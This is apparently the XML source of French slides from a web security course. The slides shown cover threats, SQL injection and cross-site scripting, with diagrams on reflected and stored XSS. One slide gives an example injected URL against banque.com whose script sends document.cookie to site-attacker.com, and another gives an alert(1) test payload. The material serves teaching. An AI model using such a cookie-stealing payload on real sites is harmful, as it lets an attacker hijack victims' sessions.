              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Sans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>un contrôle strict sur la syntaxe SQL dans les données entrées </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>par l’utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, la requête SQL générée peut faire en sorte que ces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>données soient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>interprétées en tant qu’instruction SQL au lieu de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>données ordinaires</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49</a:t>
            </a:fld>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1954" y="0"/>
            <a:ext cx="1900046" cy="1162828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2302004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menaces</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="11619412" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Une menace est une cause potentielle d’un incident, qui pourrait entrainer des dommages sur un bien si cette menace se concrétisait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une menace fait référence à un incident susceptible de nuire à un système ou à l’ensemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d’une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>organisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La menace qui plane sur un système englobe les types d'actions menées</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>dans le but de nuire à ce système (attaque) espionnage, vol d'informations...). </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1"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5</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagramme 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="444860266"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2895600" y="3581399"/>
          <a:ext cx="5715000" cy="339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17865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web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection SQL</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50</a:t>
            </a:fld>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196" y="3382295"/>
            <a:ext cx="7764780" cy="3133157"/>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l="17601" t="20311" r="14133" b="9688"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1456226"/>
            <a:ext cx="3560064" cy="2737842"/>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1954" y="0"/>
            <a:ext cx="1900046" cy="1162828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050629" y="2157651"/>
            <a:ext cx="2931571"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fr-FR" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Démonstration   &gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309989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web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection SQL</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51</a:t>
            </a:fld>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768" y="1567625"/>
            <a:ext cx="9815620" cy="4971287"/>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1954" y="0"/>
            <a:ext cx="1900046" cy="1162828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26787694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web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805751"/>
            <a:ext cx="11340465" cy="5175949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS (Cross Site Scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le XSS consiste à injecter du code arbitraire dans une application web et à le faire exécuter dans un navigateur web ou dans n’importe quelle autre solution permettant l’interprétation de code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Le XSS est une technique d’attaque côté client, et se sert du navigateur de ses victimes afin d’exécuter du code malveillant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La particularité </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>cette attaque est donc qu'elle ne vise pas directement le site web, mais les internautes qui le consultent. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Problématique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>cette </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>attaque est possible lorsqu'un serveur web ou une application web ne valide pas les données fournies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>les visiteurs (URL, contenu d'un formulaire, etc.) et leur renvoie ainsi du texte fourni par les internautes sans l'avoir filtré. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le but principal de cette attaque est de voler les données d’identité de l’autre utilisateur – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>des cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>des jetons de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>de numéros de carte de crédit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>et d’autres informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>nous aident à nous connecter automatiquement. Par conséquent, avec les cookies volés, nous pouvons nous connecter avec les autres identités. Et c’est l’une des raisons pour lesquelles cette attaque est considérée comme l’une des attaques les plus risquées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il existe deux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>principaux types de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>XSS :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le XSS réfléchi (non permanent)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le XSS stocké (permanent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>)</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52</a:t>
            </a:fld>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13" y="0"/>
            <a:ext cx="1635487" cy="1000918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33369699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web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="11769091" cy="1966023"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS réfléchi (non permanent)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ce type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>appelé </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>permanent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>car </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>il n’est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>enregistré </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>dans un fichier ou dans une base de données</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lorsque des données sont envoyées par un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>client, ils </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sont affichées telles quelles dans la page résultante sans être encodées en entités HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Groupe 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="289559" y="2430030"/>
            <a:ext cx="7315200" cy="4427970"/>
            <a:chOff x="2095500" y="2350078"/>
            <a:chExt cx="7315200" cy="4427970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Groupe 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2095500" y="2350078"/>
              <a:ext cx="7315200" cy="4427970"/>
              <a:chOff x="2095500" y="2350078"/>
              <a:chExt cx="7315200" cy="442797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0" y="2350078"/>
                <a:ext cx="7315200" cy="4427970"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 10"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6010275" y="6096000"/>
                <a:ext cx="2152650" cy="44291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9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4221956" y="2970310"/>
              <a:ext cx="3748087" cy="26161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fr-FR" sz="1100" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>https</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>://banque.com/?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>search</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>=&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5929873" y="5892581"/>
              <a:ext cx="2313454" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>Site web ciblé </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>https</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                </a:rPr>
                <a:t>://banque.com</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="5148370"/>
            <a:ext cx="6038850" cy="43088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fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>https://banque.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> = new Image; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>                                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>i.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>site-attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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6513" y="0"/>
            <a:ext cx="1635487" cy="1000918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21841401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web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251459" y="729553"/>
            <a:ext cx="11769091" cy="1727898"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS permanent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lorsque des données sont fournies depuis une source de données quelconque (BDD, fichiers, etc.) et sont affichées telles quelles dans la page résultante sans être encodées en entités HTML. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L’impact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>d’une XSS stockée est d’autant plus grave car elle touche tous les visiteurs de la page piégée</a:t>
            </a:r>
            <a:r>
